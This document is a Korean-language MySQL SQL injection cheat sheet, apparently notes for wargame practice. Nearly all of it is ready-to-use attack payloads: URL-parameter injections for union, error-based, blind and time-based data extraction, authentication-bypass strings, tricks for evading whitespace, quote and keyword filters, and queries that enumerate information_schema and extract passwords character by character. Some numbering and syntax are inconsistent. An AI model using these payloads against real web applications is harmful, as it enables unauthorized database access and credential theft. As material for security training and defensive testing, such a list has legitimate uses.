2. SQL INJECTION CHEAT SHEET (SQL 인젝션)

1. ?bid=if(1=1,52,2) 
 : select bid from board where bid=if(1=1,52,2);

 

2. ?bid=if((1)like(1),1,2)# 
: select if((1)like(1),1,2);

: select instr(1,1);

 

3. ?bid=52 or bid=if((select(ascii(substr((select(bid)from(board)where(bid)like(52)),1,1))))=1,52,0)

 

4. ?bid=52 union select (1)#
: select bid from board where bid=52 union select (1);

 

5. ?bid=52 union select (version())#
: select bid from board where bid=52 union select (version());

 

6. between
: SELECT * FROM contacts WHERE contact_id BETWEEN 100 AND 200;
  SELECT * FROM contacts WHERE contact_id >= 100 AND contact_id <= 200;

 

7. ?bid=52 and select(substr((select table_name from information_schema.tables limit 0,1),1,1 ) > 'a')# 
 : select bid from board where bid=52 and substr((select table_name from information_schema.tables limit 0,1),1,1 ) > 'a';

 

8. ?bid=52 and select(ascii(substr((select table_name from information_schema.tables limit 0,1),1,1 ) > 50)#
: select bid from board where bid=52 and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1 ) > 50;

 

9. ?bid=52 div 52;
: select bid from board where bid=52 div 52#
: select 52 div 1;

 

11. ?bid=52 or concat('t','e','s','t')='test'#
: select concat('t','e','s','t')='test';

 

12. ?bid=52 and bid=select(mid('abcde',52,0)='abc')#  --> ?bid=if((mid(pw,1,3))='abc',52,0)#
: select mid('abcde',1,3);
: select left('abcde',3);
: select right('abcde',3);

 

13. ?bid=(select(if(1)in(1),1,2))

 

14. PHP preg_match 공백우회
 - tab : %09 / LineFeed (\n) : %0a / Carrage Return(wr) : %0d
 - 주석 : /**/  괄호 : ()  / 더하기 : +

 

15. 공백우회 :  %09, %0a, %0b, %0c, %0d, %a0, /**/

Tab : %09 : no=1%09or%09id='admin'

Line Feed (\n): %0a : no=1%0aor%0aid='admin'

Carrage Return(\r) : %0d -> no=1%0dor%0did='admin'

주석 : /**/  -> no=1/**/or/**/id='admin'

괄호 : ()  -> no=(1)or(id='admin')

더하기 : +  -> no=1+or+id='admin'

null : %00

 

16. #, -- 우회 : ;%00, /*

 

17. 싱글쿼터 우회 
 - 2진법, 16진법 select x'61' = 'a' / select 0x'61' = 'a'
 - 36진법 : select conv(10,10,36) = 'A'

18. auto type cast
 - false = 0
 - true = 1
 - true+true = 2
 - floor(version()) = 5

 

19. substr( -> subtring(
 - substr('test' from 1 for 1)='a''

 

20. like query
 - select id from member where id like 'a%'
 - select id from member where id like 'b%'
 - select id from member where id like 'c%'
 - select id from member where id like 'ca%'
 - select id from member where id like 'cb%'
 - select id from member where id like 'cc%'

 

21. filtering 
 - select mid('asd',1,1) = 'a'
 - select lpad('asd',1,space(1)) = 'a'
 - select rpad('asd',1,space(1)) = 'a'
 - select reverse(right(reverse('asd'),1)) = 'a'
 - select insert(insert('asd',1,0,space(0)),2,222,space(0)) = 'a'
 - select right(left('asd',1),1) = 'a'
 - select right(left('asd',2),1) = 's'
 - select right(left('asd',3),1) = 'd'

22. if : case(), ifnull(), nullif() 

 

23. concat : select 'a' 's' 'd' 'f'='asdf' 

 

24. sleep ->  select benchmark(1000000,MD5(CHAR(118)))

 

25. Magic Quota 우회 
 - Magic Quota는 GET, POST, COOKIE에만 적용됨
 - insert into uploadfile vaules('filename', 'path') -> fdsa'),(user(),'1234'),('asdf
 -> insert into uploadfile values('asdf','fdsa'),(version(), '1234'),('asdf','path')

26. Error Based SQL Injection (키값을 여러개로 주고 에러 발생 유도)
 - select sum(5),concat(version(),floor(rand(0)*2))as a from information_schema.tables group by a;
 - select * from (select name_const(version(),1),name_const(version(),1))a
 - select * from table where 1=1 and ExtractValue(1,concat(0x01,version()))
 - select * from table where 1=1 and UpdateXML(1,concat(0x01,version()),1)
 - select * from table where (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)

 - if+union select 에러
 - select * from table where 1 and if(1=2,1,(select 1 union select 2))

27. 실행중인 쿼리 목록 : select * from information_schema.processlist; -> 쿼리 구조 파악가능;

 

29. lpad 내용 추가

 

30. Limit 우회

- max, min, group_concat

 

31. union, group by, order by (error base)

select * from user where num=-1 order by 2;

select * from user where num=1 order by 3;

select * from user where num=1 group by 3;

select * from user where num=-1 union select 1,2,3;

 

32. substr 우회 : mid, right(left), substring

33. ascii 우회 : ord, hex

select ord('test'); -> 116 -> t

select ord(mid('test',2,1));

 

32. Attack Example
 - Auth Injection : ?id=admin' or '1'='1# / ?id=admin or 1=1# / ?id=admin and 1=1# / ?id=admin' or 1# / ?id=admin' or 1-- / ' or 1#
 - Union Injection : ?id=56 union select 1,1,1,version()# 
 - Blind Injection
   ?id=apple and ascii(substr(pw,1,1))='a'#
   ?id=if(1=1,1,0) / ?id=admin and length(pw)=5#
   ?id=admin' and substr(pw,1,1)='a' or id='garbage
   ?id=admin' and ascii(substr(pw,1,1))<65 / ?id=admin' and ascii(substr(pw,1,1))LIKE(65)
   ?id=admin' and ascii(substr(pw,1,1))IN(65) / ?bid=if((mid(pw,1,3))='abc',52,0)#
   ?id=guest' and 1=if(ascii(substr(select(table_name)from(information_schema.tables)limit(0,1))))=1,1,0) or '1'='0
   ?id=guest' and substr(pw,1,1)='a' or '1'='0
   ?id=guest' and length(pw)=5 or '1'='0 / ?id=guest' and if(length(pw)=5,sleep(4),0) or '1'='0
   ?id=guest' and ascii(mid(pw,1,1))=54 or '1'='1 / ?id=guest' and mid(pw,1,1)='a' or '1'='1
   ?id=1 and 1=(ascii(substr(pw,1,1)) between 100 and 100);
   ?id=1 and 1=if((ascii(substr(pw,1,1)) between 100 and 100)=1,1,0);

 

31. mysql information schema
 - select(substr((select(max(table_name))from(information_schema.tables)where(TABLE_TYPE)=('BASE TABLE')),1,1));